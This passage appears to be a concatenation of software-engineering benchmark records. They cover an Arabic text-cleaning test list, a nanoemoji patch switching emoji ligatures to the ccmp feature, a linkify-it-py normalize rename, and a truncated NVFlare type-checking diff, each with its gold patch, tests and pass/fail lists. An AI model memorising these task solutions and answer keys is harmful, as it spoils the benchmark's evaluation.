"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u064a\\u0648\\u0645-\\u0649\\u0648\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0631\\u0628\\u0648-\\u0631\\u066e\\u0648]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062a\\u0631-\\u0648\\u066e\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062b\\u0628-\\u0648\\u066e\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062c\\u0644-\\u0648\\u062d\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0645\\u062e\\u062f\\u0631-\\u0645\\u062d\\u062f\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0630\\u0631-\\u062d\\u062f\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0632\\u0631-\\u0648\\u0631\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0634\\u062f-\\u062d\\u0633\\u062f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0636\\u0648\\u0621-\\u0648\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0638\\u0631-\\u062d\\u0637\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0635\\u063a\\u0649-\\u0635\\u0639\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0627\\u0641\\u0644\\u0627\\u0645-\\u0627\\u06a1\\u0644\\u0627\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0642\\u0649-\\u0648\\u066f\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0633\\u0646\\u0629-\\u0633\\u066e\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0633\\u0644\\u064a\\u0645-\\u0633\\u0644\\u0649\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0628-\\u0635\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0633\\u062a-\\u0633\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u062b-\\u062d\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u0631\\u062c-\\u062d\\u0631\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0645\\u062e-\\u0645\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0639\\u0648\\u0630-\\u0639\\u0648\\u062f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0632-\\u0648\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0631\\u0634-\\u0631\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0636\\u0648\\u0621-\\u0648\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0639\\u0638-\\u0648\\u0639\\u0637]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0645\\u063a-\\u0635\\u0645\\u0639]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0641\\u0649-\\u0648\\u06a1\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u0642-\\u062d\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0633\\u0646-\\u0633\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0645\\u064a-\\u0645\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0644\\u0627\\u0629-\\u0635\\u0644\\u0627\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\u064f",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\n\\u0642\\u0648\\u064a-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba\\n\\u066f\\u0648\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646.-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba.0]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646.-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba.1]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\u061f-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba\\u061f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u0652\\u064a\\u0627\\u0646\\U0001f60a-\\u0627\\u0644\\u066e\\u066e\\u0652\\u0649\\u0627\\u06ba\\U0001f60a]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u0652\\u064a\\u0627\\u0646\\u064f\\u060c-\\u0627\\u0644\\u066e\\u066e\\u0652\\u0649\\u0627\\u06ba\\u064f\\u060c]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_general[\\u200f\\u0627\\u062d\\u0630\\u0631\\u0648\\u0627",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_general[\\u0627\\u0644\\u0645\\u062a\\u0633\\u0644\\u0633\\u0644\\u0627\\u062a"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-08-04 08:47:59+00:00
|
bsd-3-clause
| 737
|
|
googlefonts__nanoemoji-280
|
diff --git a/src/nanoemoji/features.py b/src/nanoemoji/features.py
index 741ed2c..454df73 100644
--- a/src/nanoemoji/features.py
+++ b/src/nanoemoji/features.py
@@ -20,14 +20,17 @@
from nanoemoji.glyph import glyph_name
-def generate_fea(rgi_sequences):
- # Generate rlig feature with ligature lookup for multi-codepoint RGIs
+DEFAULT_GSUB_FEATURE_TAG = "ccmp"
+
+
+def generate_fea(rgi_sequences, feature_tag=DEFAULT_GSUB_FEATURE_TAG):
+ # Generate feature with ligature lookup for multi-codepoint RGIs
rules = []
rules.append("languagesystem DFLT dflt;")
rules.append("languagesystem latn dflt;")
rules.append("")
- rules.append("feature rlig {")
+ rules.append(f"feature {feature_tag} {{")
for rgi in sorted(rgi_sequences):
if len(rgi) == 1:
continue
@@ -35,6 +38,6 @@ def generate_fea(rgi_sequences):
target = glyph_name(rgi)
rules.append(" sub %s by %s;" % (" ".join(glyphs), target))
- rules.append("} rlig;")
+ rules.append(f"}} {feature_tag};")
rules.append("")
return "\n".join(rules)
|
googlefonts/nanoemoji
|
67081b8abe14771b757a95791cf6b1d03e9ecf52
|
diff --git a/tests/features_test.py b/tests/features_test.py
new file mode 100644
index 0000000..fba756e
--- /dev/null
+++ b/tests/features_test.py
@@ -0,0 +1,19 @@
+from textwrap import dedent
+from nanoemoji.features import generate_fea, DEFAULT_GSUB_FEATURE_TAG
+import pytest
+
+
+@pytest.mark.parametrize("feature_tag", (DEFAULT_GSUB_FEATURE_TAG, "rlig"))
+def test_generate_fea(feature_tag):
+ rgi_sequences = [(0x1F64C,), (0x1F64C, 0x1F3FB), (0x1F64C, 0x1F3FC)]
+ assert generate_fea(rgi_sequences, feature_tag=feature_tag) == dedent(
+ f"""\
+ languagesystem DFLT dflt;
+ languagesystem latn dflt;
+
+ feature {feature_tag} {{
+ sub g_1f64c g_1f3fb by g_1f64c_1f3fb;
+ sub g_1f64c g_1f3fc by g_1f64c_1f3fc;
+ }} {feature_tag};
+ """
+ )
|
Ligature changed from rlig feature to ccmp
Different platforms or browsers have some differences in ligature support([Test](http://unifraktur.sourceforge.net/testcases/enable_opentype_features/)). Let us discuss what issues should be paid attention to in emoji ligatures.
noto-emoji and noto-emoji-svg both use ccmp by default
https://github.com/googlefonts/noto-emoji/blob/41ae6686ace1453b432ac907a165428f2e1ad54e/NotoColorEmoji.tmpl.ttx.tmpl#L311
https://github.com/adobe-fonts/noto-emoji-svg/blob/ed5c78c8e3d46fdf8dbf7532875aaabfdcdc5c3a/GSUB.fea#L4
|
0.0
|
67081b8abe14771b757a95791cf6b1d03e9ecf52
|
[
"tests/features_test.py::test_generate_fea[ccmp]",
"tests/features_test.py::test_generate_fea[rlig]"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-04-19 14:52:41+00:00
|
apache-2.0
| 2,639
|
|
tsutsu3__linkify-it-py-24
|
diff --git a/README.md b/README.md
index 0763763..bd45d54 100644
--- a/README.md
+++ b/README.md
@@ -2,6 +2,7 @@
[](https://github.com/tsutsu3/linkify-it-py/actions)
[](https://pypi.org/project/linkify-it-py/)
+[](https://anaconda.org/conda-forge/linkify-it-py)
[](https://codecov.io/gh/tsutsu3/linkify-it-py)
[](https://codeclimate.com/github/tsutsu3/linkify-it-py/maintainability)
@@ -25,6 +26,12 @@ Why it's awesome:
pip install linkify-it-py
```
+or
+
+```bash
+conda install -c conda-forge linkify-it-py
+```
+
## Usage examples
### Example 1. Simple use
@@ -82,28 +89,28 @@ print(linkify.match("Site tamanegi.onion!"))
### Example 3. Add twitter mentions handler
```python
-from linkify import LinkfiyIt
+from linkify_it import LinkifyIt
-linkifyit = LinkifyIt()
+linkify = LinkifyIt()
-def validate(self, text, pos):
+def validate(obj, text, pos):
tail = text[pos:]
- if not self.re.get("twitter"):
- self.re["twitter"] = re.compile(
- "^([a-zA-Z0-9_]){1,15}(?!_)(?=$|" + self.re["src_ZPCc"] + ")"
+ if not obj.re.get("twitter"):
+ obj.re["twitter"] = re.compile(
+ "^([a-zA-Z0-9_]){1,15}(?!_)(?=$|" + obj.re["src_ZPCc"] + ")"
)
- if self.re["twitter"].search(tail):
+ if obj.re["twitter"].search(tail):
if pos > 2 and tail[pos - 2] == "@":
return False
- return len(self.re["twitter"].search(tail).group())
+ return len(obj.re["twitter"].search(tail).group())
return 0
-def normalize(self, m):
- m.url = "https://twitter.com/" + re.sub(r"^@", "", m.url)
+def normalize(obj, match):
+ match.url = "https://twitter.com/" + re.sub(r"^@", "", match.url)
-linkifyit.add("@", {"validate": validate, "normalize": normalize})
+linkify.add("@", {"validate": validate, "normalize": normalize})
```
diff --git a/linkify_it/main.py b/linkify_it/main.py
index 7e6af33..b06a7b3 100644
--- a/linkify_it/main.py
+++ b/linkify_it/main.py
@@ -189,7 +189,7 @@ class LinkifyIt:
def _create_normalizer(self):
def func(match):
- self._normalize(match)
+ self.normalize(match)
return func
@@ -590,11 +590,11 @@ class LinkifyIt:
self._compile()
return self
- def _normalize(self, match):
+ def normalize(self, match):
"""Default normalizer (if schema does not define it's own).
Args:
- match ():
+ match (:class:`linkify_it.main.Match`): Match result
"""
if not match.schema:
match.url = "http://" + match.url
|
tsutsu3/linkify-it-py
|
1e35d3c46172864eb3e2c275d6e797a1b2acb43e
|
diff --git a/test/test_linkify.py b/test/test_linkify.py
index afa4f00..79bf297 100644
--- a/test/test_linkify.py
+++ b/test/test_linkify.py
@@ -20,7 +20,7 @@ def dummy(_):
def test_links(number, line, expected):
linkifyit = LinkifyIt(options={"fuzzy_ip": True})
- linkifyit._normalize = dummy
+ linkifyit.normalize = dummy
assert linkifyit.pretest(line) is True
assert linkifyit.test("\n" + line + "\n") is True
@@ -35,6 +35,6 @@ def test_links(number, line, expected):
def test_not_links(number, line, expected):
linkifyit = LinkifyIt()
- linkifyit._normalize = dummy
+ linkifyit.normalize = dummy
assert linkifyit.test(line) is False
|
Release on conda-forge
If you release on conda-forge, then I'll include in markdown-it-py conda requirements 😄
(If you don't know, you need to make a PR to https://github.com/conda-forge/staged-recipes)
|
0.0
|
1e35d3c46172864eb3e2c275d6e797a1b2acb43e
|
[
"test/test_linkify.py::test_links[49->>example.com",
"test/test_linkify.py::test_links[88-4.4.4.4-4.4.4.4]",
"test/test_linkify.py::test_links[90-192.168.1.1/abc-192.168.1.1/abc]",
"test/test_linkify.py::test_links[102-google.com-google.com]",
"test/test_linkify.py::test_links[104-google.com:",
"test/test_linkify.py::test_links[107-s.l.o.w.io-s.l.o.w.io]",
"test/test_linkify.py::test_links[109-a-b.com-a-b.com]",
"test/test_linkify.py::test_links[111-GOOGLE.COM.-GOOGLE.COM]",
"test/test_linkify.py::test_links[114-google.xxx",
"test/test_linkify.py::test_links[153-[example.com/foo_bar.jpg)]-example.com/foo_bar.jpg]",
"test/test_linkify.py::test_links[218-<domain.com>-domain.com]",
"test/test_linkify.py::test_links[221-<domain.com>.-domain.com]",
"test/test_linkify.py::test_links[224-<domain.com/foo>-domain.com/foo]",
"test/test_linkify.py::test_links[227-<user@domain.com>-user@domain.com]",
"test/test_linkify.py::test_links[230-<user@domain.com>.-user@domain.com]",
"test/test_linkify.py::test_links[241-test.\"foo\".bar@gmail.co.uk!-test.\"foo\".bar@gmail.co.uk]",
"test/test_linkify.py::test_links[244-\"test@example.com\"-test@example.com]",
"test/test_linkify.py::test_links[247-name@example.com-name@example.com]",
"test/test_linkify.py::test_links[249->>name@example.com",
"test/test_linkify.py::test_links[258-foo+bar@gmail.com-foo+bar@gmail.com]",
"test/test_linkify.py::test_links[260-192.168.1.1@gmail.com-192.168.1.1@gmail.com]",
"test/test_linkify.py::test_links[265-(foobar",
"test/test_linkify.py::test_links[268-(email@example.com",
"test/test_linkify.py::test_links[271-(email@example.com)-email@example.com]",
"test/test_linkify.py::test_links[282-a.ws-a.ws]",
"test/test_linkify.py::test_links[284-\\u27a1.ws/\\u4a39-\\u27a1.ws/\\u4a39]",
"test/test_linkify.py::test_links[286-example.com/\\u4a39-example.com/\\u4a39]",
"test/test_linkify.py::test_links[288-\\u043f\\u0440\\u0435\\u0437\\u0438\\u0434\\u0435\\u043d\\u0442.\\u0440\\u0444-\\u043f\\u0440\\u0435\\u0437\\u0438\\u0434\\u0435\\u043d\\u0442.\\u0440\\u0444]",
"test/test_linkify.py::test_links[309-\\uff5cwww.google.com/www.google.com/foo\\uff5cbar",
"test/test_linkify.py::test_links[312-\\uff5ctest@google.com\\uff5cbar-test@google.com]",
"test/test_linkify.py::test_links[324-www.a--b.com-www.a--b.com]",
"test/test_linkify.py::test_links[326-www.c--u.com-www.c--u.com]"
] |
[
"test/test_linkify.py::test_links[4-My",
"test/test_linkify.py::test_links[7-My",
"test/test_linkify.py::test_links[10-http://example.com/foo_bar/-http://example.com/foo_bar/]",
"test/test_linkify.py::test_links[12-http://user:pass@example.com:8080-http://user:pass@example.com:8080]",
"test/test_linkify.py::test_links[14-http://user@example.com-http://user@example.com]",
"test/test_linkify.py::test_links[16-http://user@example.com:8080-http://user@example.com:8080]",
"test/test_linkify.py::test_links[18-http://user:pass@example.com-http://user:pass@example.com]",
"test/test_linkify.py::test_links[20-[https](https://www.ibm.com)[mailto](mailto:someone@ibm.com)",
"test/test_linkify.py::test_links[23-http://example.com:8080-http://example.com:8080]",
"test/test_linkify.py::test_links[25-http://example.com/?foo=bar-http://example.com/?foo=bar]",
"test/test_linkify.py::test_links[27-http://example.com?foo=bar-http://example.com?foo=bar]",
"test/test_linkify.py::test_links[29-http://example.com/#foo=bar-http://example.com/#foo=bar]",
"test/test_linkify.py::test_links[31-http://example.com#foo=bar-http://example.com#foo=bar]",
"test/test_linkify.py::test_links[33-http://a.in-http://a.in]",
"test/test_linkify.py::test_links[35-HTTP://GOOGLE.COM-HTTP://GOOGLE.COM]",
"test/test_linkify.py::test_links[37-http://example.invalid",
"test/test_linkify.py::test_links[40-http://inrgess2",
"test/test_linkify.py::test_links[43-http://999",
"test/test_linkify.py::test_links[46-http://host-name",
"test/test_linkify.py::test_links[52->>http://example.com",
"test/test_linkify.py::test_links[55-http://lyricstranslate.com/en/someone-you-\\u0d28\\u0d3f\\u0d28\\u0d4d\\u0d28\\u0d46-\\u0d2a\\u0d4b\\u0d32\\u0d4a\\u0d30\\u0d3e\\u0d33\\u0d4d\\u200d.html",
"test/test_linkify.py::test_links[61-//localhost-//localhost]",
"test/test_linkify.py::test_links[63-//test.123-//test.123]",
"test/test_linkify.py::test_links[65-http://localhost:8000?-http://localhost:8000]",
"test/test_linkify.py::test_links[72-My",
"test/test_linkify.py::test_links[75-My",
"test/test_linkify.py::test_links[82-My",
"test/test_linkify.py::test_links[96-test.example@http://vk.com-http://vk.com]",
"test/test_linkify.py::test_links[99-text:http://example.com/-http://example.com/]",
"test/test_linkify.py::test_links[121-(Scoped",
"test/test_linkify.py::test_links[124-http://example.com/foo_bar_(wiki)-http://example.com/foo_bar_(wiki)]",
"test/test_linkify.py::test_links[126-http://foo.com/blah_blah_[other]-http://foo.com/blah_blah_[other]]",
"test/test_linkify.py::test_links[128-http://foo.com/blah_blah_{I'm_king}-http://foo.com/blah_blah_{I'm_king}]",
"test/test_linkify.py::test_links[130-http://foo.com/blah_blah_I'm_king-http://foo.com/blah_blah_I'm_king]",
"test/test_linkify.py::test_links[132-http://www.kmart.com/bestway-10'-x-30inch-steel-pro-frame-pool/p-004W007538417001P-http://www.kmart.com/bestway-10'-x-30inch-steel-pro-frame-pool/p-004W007538417001P]",
"test/test_linkify.py::test_links[134-http://foo.com/blah_blah_\"doublequoted\"-http://foo.com/blah_blah_\"doublequoted\"]",
"test/test_linkify.py::test_links[136-http://foo.com/blah_blah_'singlequoted'-http://foo.com/blah_blah_'singlequoted']",
"test/test_linkify.py::test_links[138-(Scoped",
"test/test_linkify.py::test_links[141-[Scoped",
"test/test_linkify.py::test_links[144-{Scoped",
"test/test_linkify.py::test_links[147-\"Quoted",
"test/test_linkify.py::test_links[150-'Quoted",
"test/test_linkify.py::test_links[156-http://example.com/foo_bar.jpg.-http://example.com/foo_bar.jpg]",
"test/test_linkify.py::test_links[159-http://example.com/foo_bar/.-http://example.com/foo_bar/]",
"test/test_linkify.py::test_links[162-http://example.com/foo_bar,-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[165-https://github.com/markdown-it/linkify-it/compare/360b13a733f521a8d4903d3a5e1e46c357e9d3ce...f580766349525150a80a32987bb47c2d592efc33-https://github.com/markdown-it/linkify-it/compare/360b13a733f521a8d4903d3a5e1e46c357e9d3ce...f580766349525150a80a32987bb47c2d592efc33]",
"test/test_linkify.py::test_links[167-https://www.google.com/search?sxsrf=ACYBGNTJFmX-GjNJ8fM-2LCkqyNyxGU1Ng%3A1575534146332&ei=Qr7oXf7rE4rRrgSEgrmoAw&q=clover&oq=clover&gs_l=psy-ab.3..0i67j0l9.2986.3947..4187...0.2..0.281.1366.1j0j5......0....1..gws-wiz.......0i71j35i39j0i131.qWp1nz4IJVA&ved=0ahUKEwj-lP6Iip7mAhWKqIsKHQRBDjUQ4dUDCAs&uact=5-https://www.google.com/search?sxsrf=ACYBGNTJFmX-GjNJ8fM-2LCkqyNyxGU1Ng%3A1575534146332&ei=Qr7oXf7rE4rRrgSEgrmoAw&q=clover&oq=clover&gs_l=psy-ab.3..0i67j0l9.2986.3947..4187...0.2..0.281.1366.1j0j5......0....1..gws-wiz.......0i71j35i39j0i131.qWp1nz4IJVA&ved=0ahUKEwj-lP6Iip7mAhWKqIsKHQRBDjUQ4dUDCAs&uact=5]",
"test/test_linkify.py::test_links[169-https://ourworldindata.org/grapher/covid-deaths-days-since-per-million?zoomToSelection=true&time=9..&country=FRA+DEU+ITA+ESP+GBR+USA+CAN-https://ourworldindata.org/grapher/covid-deaths-days-since-per-million?zoomToSelection=true&time=9..&country=FRA+DEU+ITA+ESP+GBR+USA+CAN]",
"test/test_linkify.py::test_links[171-http://example.com/foo_bar...-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[174-http://172.26.142.48/viewerjs/#../0529/slides.pdf-http://172.26.142.48/viewerjs/#../0529/slides.pdf]",
"test/test_linkify.py::test_links[176-http://example.com/foo_bar..-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[179-http://example.com/foo_bar?p=10.-http://example.com/foo_bar?p=10]",
"test/test_linkify.py::test_links[182-https://www.google.ru/maps/@59.9393895,30.3165389,15z?hl=ru-https://www.google.ru/maps/@59.9393895,30.3165389,15z?hl=ru]",
"test/test_linkify.py::test_links[184-https://www.google.com/maps/place/New+York,+NY,+USA/@40.702271,-73.9968471,11z/data=!4m2!3m1!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62?hl=en-https://www.google.com/maps/place/New+York,+NY,+USA/@40.702271,-73.9968471,11z/data=!4m2!3m1!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62?hl=en]",
"test/test_linkify.py::test_links[186-https://www.google.com/analytics/web/?hl=ru&pli=1#report/visitors-overview/a26895874w20458057p96934174/-https://www.google.com/analytics/web/?hl=ru&pli=1#report/visitors-overview/a26895874w20458057p96934174/]",
"test/test_linkify.py::test_links[188-http://business.timesonline.co.uk/article/0,,9065-2473189,00.html-http://business.timesonline.co.uk/article/0,,9065-2473189,00.html]",
"test/test_linkify.py::test_links[190-https://google.com/mail/u/0/#label/!!!Today/15c9b8193da01e65-https://google.com/mail/u/0/#label/!!!Today/15c9b8193da01e65]",
"test/test_linkify.py::test_links[192-http://example.com/123!-http://example.com/123]",
"test/test_linkify.py::test_links[195-http://example.com/123!!!-http://example.com/123]",
"test/test_linkify.py::test_links[198-http://example.com/foo--bar-http://example.com/foo--bar]",
"test/test_linkify.py::test_links[201-http://www.bloomberg.com/news/articles/2015-06-26/from-deutsche-bank-to-siemens-what-s-troubling-germany-inc--http://www.bloomberg.com/news/articles/2015-06-26/from-deutsche-bank-to-siemens-what-s-troubling-germany-inc-]",
"test/test_linkify.py::test_links[203-http://example.com/foo-with-trailing-dash-dot-.-http://example.com/foo-with-trailing-dash-dot-]",
"test/test_linkify.py::test_links[206-<http://domain.com>-http://domain.com]",
"test/test_linkify.py::test_links[209-<http://domain.com>.-http://domain.com]",
"test/test_linkify.py::test_links[212-<http://domain.com/foo>-http://domain.com/foo]",
"test/test_linkify.py::test_links[215-<http://domain.com/foo>.-http://domain.com/foo]",
"test/test_linkify.py::test_links[233-<mailto:user@domain.com>-mailto:user@domain.com]",
"test/test_linkify.py::test_links[252-mailto:name@example.com-mailto:name@example.com]",
"test/test_linkify.py::test_links[254-MAILTO:NAME@EXAMPLE.COM-MAILTO:NAME@EXAMPLE.COM]",
"test/test_linkify.py::test_links[256-mailto:foo_bar@example.com-mailto:foo_bar@example.com]",
"test/test_linkify.py::test_links[262-mailto:foo@bar",
"test/test_linkify.py::test_links[278-http://\\u272adf.ws/123-http://\\u272adf.ws/123]",
"test/test_linkify.py::test_links[280-http://xn--df-oiy.ws/123-http://xn--df-oiy.ws/123]",
"test/test_linkify.py::test_links[294-http://www.b\\xfcrgerentscheid-krankenh\\xe4user.de-http://www.b\\xfcrgerentscheid-krankenh\\xe4user.de]",
"test/test_linkify.py::test_links[296-http://www.xn--brgerentscheid-krankenhuser-xkc78d.de-http://www.xn--brgerentscheid-krankenhuser-xkc78d.de]",
"test/test_linkify.py::test_links[298-http://b\\xfcndnis-f\\xfcr-krankenh\\xe4user.de/wp-content/uploads/2011/11/cropped-logohp.jpg-http://b\\xfcndnis-f\\xfcr-krankenh\\xe4user.de/wp-content/uploads/2011/11/cropped-logohp.jpg]",
"test/test_linkify.py::test_links[300-http://xn--bndnis-fr-krankenhuser-i5b27cha.de/wp-content/uploads/2011/11/cropped-logohp.jpg-http://xn--bndnis-fr-krankenhuser-i5b27cha.de/wp-content/uploads/2011/11/cropped-logohp.jpg]",
"test/test_linkify.py::test_links[302-http://\\ufee1\\ufeee\\ufed8\\ufecb.\\ufeed\\ufeaf\\ufe8d\\ufead\\ufe93-\\ufe8d\\ufefc\\ufe98\\ufebb\\ufe8d\\ufefc\\ufe97.\\ufee2\\ufebb\\ufead/-http://\\ufee1\\ufeee\\ufed8\\ufecb.\\ufeed\\ufeaf\\ufe8d\\ufead\\ufe93-\\ufe8d\\ufefc\\ufe98\\ufebb\\ufe8d\\ufefc\\ufe97.\\ufee2\\ufebb\\ufead/]",
"test/test_linkify.py::test_links[304-http://xn--4gbrim.xn----ymcbaaajlc6dj7bxne2c.xn--wgbh1c/-http://xn--4gbrim.xn----ymcbaaajlc6dj7bxne2c.xn--wgbh1c/]",
"test/test_linkify.py::test_links[315-\\uff5chttp://google.com\\uff5cbar-http://google.com]",
"test/test_linkify.py::test_links[322-https://5b0ee223b312746c1659db3f--thelounge-chat.netlify.com/docs/-https://5b0ee223b312746c1659db3f--thelounge-chat.netlify.com/docs/]",
"test/test_linkify.py::test_links[328-http://a---b.com/-http://a---b.com/]",
"test/test_linkify.py::test_not_links[4-example.invalid-example.invalid/]",
"test/test_linkify.py::test_not_links[6-http://.example.com-http://-example.com]",
"test/test_linkify.py::test_not_links[8-hppt://example.com-example.coma]",
"test/test_linkify.py::test_not_links[10--example.coma-foo.123]",
"test/test_linkify.py::test_not_links[12-localhost",
"test/test_linkify.py::test_not_links[14-///localhost",
"test/test_linkify.py::test_not_links[16-//test",
"test/test_linkify.py::test_not_links[18-_http://example.com-_//example.com]",
"test/test_linkify.py::test_not_links[20-_example.com-http://example.com_]",
"test/test_linkify.py::test_not_links[22-@example.com-@example.com]",
"test/test_linkify.py::test_not_links[24-node.js",
"test/test_linkify.py::test_not_links[26-http://-http://.]",
"test/test_linkify.py::test_not_links[28-http://..-http://#]",
"test/test_linkify.py::test_not_links[30-http://##-http://?]",
"test/test_linkify.py::test_not_links[32-http://??-google.com:500000",
"test/test_linkify.py::test_not_links[34-show",
"test/test_linkify.py::test_not_links[36-/path/to/file.pl-/path/to/file.pl]",
"test/test_linkify.py::test_not_links[41-1.2.3.4.5-1.2.3]",
"test/test_linkify.py::test_not_links[43-1.2.3.400-1000.2.3.4]",
"test/test_linkify.py::test_not_links[45-a1.2.3.4-1.2.3.4a]",
"test/test_linkify.py::test_not_links[51-foo@bar"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-12-19 07:54:04+00:00
|
mit
| 6,103
|
|
NVIDIA__NVFlare-56
|
diff --git a/nvflare/apis/analytix.py b/nvflare/apis/analytix.py
index b99c10f3..26a6423b 100644
--- a/nvflare/apis/analytix.py
+++ b/nvflare/apis/analytix.py
@@ -17,8 +17,8 @@ from typing import Optional
from nvflare.apis.dxo import DXO, DataKind
-DATA_TYPE_KEY = "analytics_data_type"
-KWARGS_KEY = "analytics_kwargs"
+_DATA_TYPE_KEY = "analytics_data_type"
+_KWARGS_KEY = "analytics_kwargs"
class AnalyticsDataType(Enum):
@@ -29,7 +29,7 @@ class AnalyticsDataType(Enum):
class AnalyticsData:
- def __init__(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict]):
+ def __init__(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict] = None):
"""This class defines AnalyticsData format.
It is a wrapper to provide from / to DXO conversion.
@@ -39,6 +39,18 @@ class AnalyticsData:
data_type (AnalyticDataType): type of the analytic data.
kwargs (optional, dict): additional arguments to be passed.
"""
+ if not isinstance(tag, str):
+ raise TypeError(f"expect tag to be an instance of str, but got {type(tag)}.")
+ if not isinstance(data_type, AnalyticsDataType):
+ raise TypeError(f"expect data_type to be an instance of AnalyticsDataType, but got {type(data_type)}.")
+ if kwargs and not isinstance(kwargs, dict):
+ raise TypeError(f"expect kwargs to be an instance of dict, but got {type(kwargs)}.")
+ if data_type == AnalyticsDataType.SCALAR and not isinstance(value, float):
+ raise TypeError(f"expect value to be an instance of float, but got {type(value)}")
+ elif data_type == AnalyticsDataType.SCALARS and not isinstance(value, dict):
+ raise TypeError(f"expect value to be an instance of dict, but got {type(value)}")
+ elif data_type == AnalyticsDataType.TEXT and not isinstance(value, str):
+ raise TypeError(f"expect value to be an instance of str, but got {type(value)}")
self.tag = tag
self.value = value
self.data_type = data_type
@@ -47,8 +59,8 @@ class AnalyticsData:
def to_dxo(self):
"""Converts the AnalyticsData to DXO object."""
dxo = DXO(data_kind=DataKind.ANALYTIC, data={self.tag: self.value})
- dxo.set_meta_prop(DATA_TYPE_KEY, self.data_type)
- dxo.set_meta_prop(KWARGS_KEY, self.kwargs)
